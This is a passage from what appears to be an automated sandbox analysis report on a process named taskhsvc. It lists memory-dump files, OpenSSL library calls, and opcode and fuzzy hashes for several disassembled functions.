                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_freeO_malloc$N_bin2bnN_bn2decN_dupN_num_bitsO_freeR_put_errorR_to___stack_chk_fail
                                                            • String ID: A$x
                                                            • API String ID: 1840720445-556738125
                                                            • Opcode ID: 65b03b9d07b138a2746e3a229b1fcf1ce255390e7c10d96a4984f1bbc5358767
                                                            • Instruction ID: 15cf917becafe0e4eb27bcd52ebc202cd0357f44a6ab73ecd6647192b1b2d90d
                                                            • Opcode Fuzzy Hash: 65b03b9d07b138a2746e3a229b1fcf1ce255390e7c10d96a4984f1bbc5358767
                                                            • Instruction Fuzzy Hash: 63015EB16097018BEB00AF75D54435BBBF0AB45318F11DC2CE9948B745DB39D40ACBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF7CE80 Relevance: 12.1, APIs: 8, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: df833e08da4ad7a27a29e980c6aefddc0f148ee6515af43a16793bdb96bea899
                                                            • Instruction ID: 5c99f603084b3b9a56907f6638bbea95ec3f2ffbd227d66ebfe15855476f5296
                                                            • Opcode Fuzzy Hash: df833e08da4ad7a27a29e980c6aefddc0f148ee6515af43a16793bdb96bea899
                                                            • Instruction Fuzzy Hash: A941C6356087019FCB14DF69D680A4BB7F1BB89318F42992DEAA8A7700D730F905CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF425E0 Relevance: 12.1, APIs: 8, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • X509_CRL_INFO_it.LIBEAY32 ref: 6CF42619
                                                            • ASN1_item_sign.LIBEAY32 ref: 6CF42641
                                                              • Part of subcall function 6CEFF5E0: EVP_MD_CTX_init.LIBEAY32 ref: 6CEFF62E
                                                              • Part of subcall function 6CEFF5E0: EVP_DigestSignInit.LIBEAY32 ref: 6CEFF64E
                                                              • Part of subcall function 6CEFF5E0: ASN1_item_sign_ctx.LIBEAY32 ref: 6CEFF67E
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CF4265A
                                                            • X509_CRL_INFO_it.LIBEAY32 ref: 6CF42691
                                                            • ASN1_item_sign_ctx.LIBEAY32 ref: 6CF426B1
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_sign_ctxO_itX509_$DigestInitN1_item_signSignX_init__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 2837452665-0
                                                            • Opcode ID: f69f1ec03c822d699df8f191fc3571ace19cf3e390a93f29da2dae5d387804ef
                                                            • Instruction ID: 8e060e011ebbfce03a3a30fe96591e0071682e7063f88bd2fef18e1d45397529
                                                            • Opcode Fuzzy Hash: f69f1ec03c822d699df8f191fc3571ace19cf3e390a93f29da2dae5d387804ef
                                                            • Instruction Fuzzy Hash: 9B31DCB49097009FCB14DF26C28480BBBF5BF89758F16891EE9989B321C770E904CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF48FA0 Relevance: 12.1, APIs: 8, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NCONF_get_section.LIBEAY32 ref: 6CF490B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: F_get_section
                                                            • String ID: A$DER:
                                                            • API String ID: 2206488356-1830918027
                                                            • Opcode ID: 0cb8fd95e90d02a4544f3a5e707770c71e6806ff665ea827682906bbf5e34395
                                                            • Instruction ID: 8b29eee559eca18e7c3da72bdcac8e345fcedc1c6bb248ad5d98113bc70042b0
                                                            • Opcode Fuzzy Hash: 0cb8fd95e90d02a4544f3a5e707770c71e6806ff665ea827682906bbf5e34395
                                                            • Instruction Fuzzy Hash: E321C2B46097019FC340DF69C58065FFBF4AF88368F11892DE99887751EB31D949CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEB06B0 Relevance: 12.1, APIs: 8, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb5f949c517c0240b32c24ff9f887cf66122bb7f63521e0e8bbe7370880006b0
                                                            • Instruction ID: fc929d5b364a37f9114e4fefefa7bb49c8ca2365e089987f85115665d51e5742
                                                            • Opcode Fuzzy Hash: eb5f949c517c0240b32c24ff9f887cf66122bb7f63521e0e8bbe7370880006b0
                                                            • Instruction Fuzzy Hash: 842134B15097518FD780EF29CA8066EBBF0AB84358F21892CE49597B80EB74D4458FC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF62550 Relevance: 12.1, APIs: 8, Instructions: 60filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc$O_free$M_freeM_growM_newO_getsO_reallocfwritesk_freesk_new_nullstrlen
                                                            • String ID: b
                                                            • API String ID: 1748592629-1908338681
                                                            • Opcode ID: 3200148eb1e346c6009dc23d4dd9d492ae3b124be959b92786a565c31aca08fd
                                                            • Instruction ID: 14e5819dcba30939079fbfb10b63af382b99bdd182437392c3611af8ae803620
                                                            • Opcode Fuzzy Hash: 3200148eb1e346c6009dc23d4dd9d492ae3b124be959b92786a565c31aca08fd
                                                            • Instruction Fuzzy Hash: 10111F706087049BDB10AF76C64869BBBF4AF44748F11491DE9A8CBB01EB36D844CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEC24F0 Relevance: 12.1, APIs: 8, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ENGINE_new.LIBEAY32 ref: 6CEC24FF
                                                              • Part of subcall function 6CEBBE50: CRYPTO_malloc.LIBEAY32 ref: 6CEBBE77
                                                              • Part of subcall function 6CEBBE50: CRYPTO_new_ex_data.LIBEAY32 ref: 6CEBBEBC
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_newO_mallocO_new_ex_data
                                                            • String ID:
                                                            • API String ID: 626356204-0
                                                            • Opcode ID: c7ac14b080034e193290c6b78a6947ce75b2881bc7156c0241c2fb131a110f06
                                                            • Instruction ID: 42958a71754c92e89abf584a0cf3dfeb36f39710be4c8fdc6c617bed8774d158
                                                            • Opcode Fuzzy Hash: c7ac14b080034e193290c6b78a6947ce75b2881bc7156c0241c2fb131a110f06
                                                            • Instruction Fuzzy Hash: 2411CB70A147018FCB50EF79C684A5FBBF4EB59308F52592CE6A4D7701E731E5098B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE28EC0 Relevance: 10.7, APIs: 7, Instructions: 181COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
